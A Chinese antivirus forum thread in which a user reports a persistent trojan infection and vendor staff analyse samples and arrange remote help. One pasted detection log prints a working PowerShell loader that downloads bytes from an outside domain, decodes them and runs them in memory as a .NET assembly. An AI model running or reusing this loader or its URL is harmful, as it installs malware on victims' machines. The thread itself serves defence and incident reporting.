火绒安全软件»论坛 › 火绒官方服务 › 动态防御问题反馈 › svchost.exe触犯敏感动作防护规则，已阻止 ...

svchost.exe触犯敏感动作防护规则，已阻止

查看数: 5953 | 评论数: 23 | 收藏 0

关灯 | 提示：支持键盘翻页<-左右->

帖子模式

io114

发布时间: 2024-6-15 23:04

正文摘要:

【1】2024-06-15 22:41:52,系统防护,系统加固,svchost.exe触犯系统免疫规则, 已阻止防护项目：流行病毒可疑文件：C:\Users\IO\AppData\Roaming\IsFlowSuppressed\Default.exe 执行命令行："C:\Users\IO\AppData\ ...

火绒运营专员 发表于 2024-7-19 14:21:42

io114 发表于 2024-7-15 20:40
今日有新报毒，全盘正在扫描，如果有报毒会反馈，请问需要上传样本吗
【1】2024-07-15 20:21:13,系统防护 ...

您好，您的问题已通过远程协助处理完成，并给出了相应的建议，后续还有问题及时反馈~

火绒运营专员 发表于 2024-7-18 09:27:51

io114 发表于 2024-7-18 01:02
qq：921408902

已添加您

io114 发表于 2024-7-18 01:02:41

火绒运营专员发表于 2024-7-16 09:40
麻烦您留一下QQ，这边添加您

qq：921408902

火绒运营专员 发表于 2024-7-16 09:40:10

io114 发表于 2024-7-15 20:40
今日有新报毒，全盘正在扫描，如果有报毒会反馈，请问需要上传样本吗
【1】2024-07-15 20:21:13,系统防护 ...

麻烦您留一下QQ，这边添加您

io114 发表于 2024-7-15 20:40:59

火绒运营专员发表于 2024-7-15 09:18
您好，您这边全盘查杀有再检出异常吗？

今日有新报毒，全盘正在扫描，如果有报毒会反馈，请问需要上传样本吗
【1】2024-07-15 20:21:13,系统防护,系统加固,powershell.exe触犯文件防护规则, 已阻止

防护项目：启动目录(扩展保护)
目标文件：C:\Users\IO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe
操作结果：已阻止

进程ID：6544
操作进程：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
操作进程命令行："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass [Byte[]] $L = (.([char]105+[char]119+[char]114) 'https://jofilesjo.com/1100' -UseBasicParsing).Content;
For ($i=0; $i -lt $L.Length; $i++) {$L[$i] = [System.BitConverter]::GetBytes($L[$i] - 1100)[0];};
$A = [System.Reflection.Assembly]::Load($L);$A.CreateInstance('B');
操作进程校验和：BC8D22B16E9AB2045C3ACFB8FF1C0CE97BD9936A
父进程ID：11784
父进程：C:\Users\IO\AppData\Local\Temp\xdvyp.exe
父进程命令行："C:\Users\IO\AppData\Local\Temp\xdvyp.exe"
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【2】2024-07-15 20:14:25,病毒防护,文件实时监控,发现病毒TrojanDownloader/MSIL.Agent.mw, 已处理

病毒名称：TrojanDownloader/MSIL.Agent.mw
病毒ID：0D25E0CF6F13F05F
病毒路径：C:\Users\IO\AppData\Local\Temp\cutagdvb.exe
操作类型：修改
操作结果：已处理，删除文件

进程ID：9940
操作进程：C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
操作进程命令行："C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
父进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

火绒运营专员 发表于 2024-7-15 09:18:03

io114 发表于 2024-7-14 19:19
想问下有结果了吗？如果是需要更多信息的话可以提供

您好，您这边全盘查杀有再检出异常吗？

io114 发表于 2024-7-14 19:19:54

火绒运营专员发表于 2024-7-8 11:00
收到信息，这边确定看看

想问下有结果了吗？如果是需要更多信息的话可以提供

火绒运营专员 发表于 2024-7-8 11:00:50

io114 发表于 2024-7-8 10:59
后续发现在系统内多处出现病毒文件和违反安全规则的程序操作，疑似是同一病毒所为，可能并未查杀干净。之 ...

收到信息，这边确定看看

io114 发表于 2024-7-8 10:59:15

火绒运营专员发表于 2024-6-17 08:56
感谢支持~

后续发现在系统内多处出现病毒文件和违反安全规则的程序操作，疑似是同一病毒所为，可能并未查杀干净。之前已经使用过专杀工具进行杀毒未报毒，有什么办法能够让工程师发现这种隐蔽病毒吗？

新日志.zip

3.23 KB, 下载次数: 2, 下载积分: 金钱 -1

火绒运营专员 发表于 2024-6-17 08:56:39

io114 发表于 2024-6-16 18:57
感谢回复，感谢你们的辛劳！

感谢支持~

io114 发表于 2024-6-16 18:57:37

火绒运营专员发表于 2024-6-16 18:13
目前看是属于木马病毒，入侵方式通过分析样本可能无法准确确认

感谢回复，感谢你们的辛劳！

火绒运营专员 发表于 2024-6-16 18:13:51

io114 发表于 2024-6-16 17:54
感谢告知，请问是否可以提供下此类病毒或恶意软件的名称？我平日使用习惯不算很差，被侵入的过程中完全对 ...

目前看是属于木马病毒，入侵方式通过分析样本可能无法准确确认

io114 发表于 2024-6-16 17:54:55

火绒运营专员发表于 2024-6-16 17:14
您好，您提交的样本经分析存在恶意行为，近期升级查杀，明日升级病毒库后您查杀再看下是否还有问题，感谢 ...

感谢告知，请问是否可以提供下此类病毒或恶意软件的名称？我平日使用习惯不算很差，被侵入的过程中完全对它没有任何感知，特别好奇它的感染方式

火绒运营专员 发表于 2024-6-16 17:14:29

io114 发表于 2024-6-16 16:14
这是提取的文件

您好，您提交的样本经分析存在恶意行为，近期升级查杀，明日升级病毒库后您查杀再看下是否还有问题，感谢您的反馈~

火绒运营专员 发表于 2024-6-16 16:23:38

io114 发表于 2024-6-16 16:20
专杀工具未报毒

收到，感谢回复~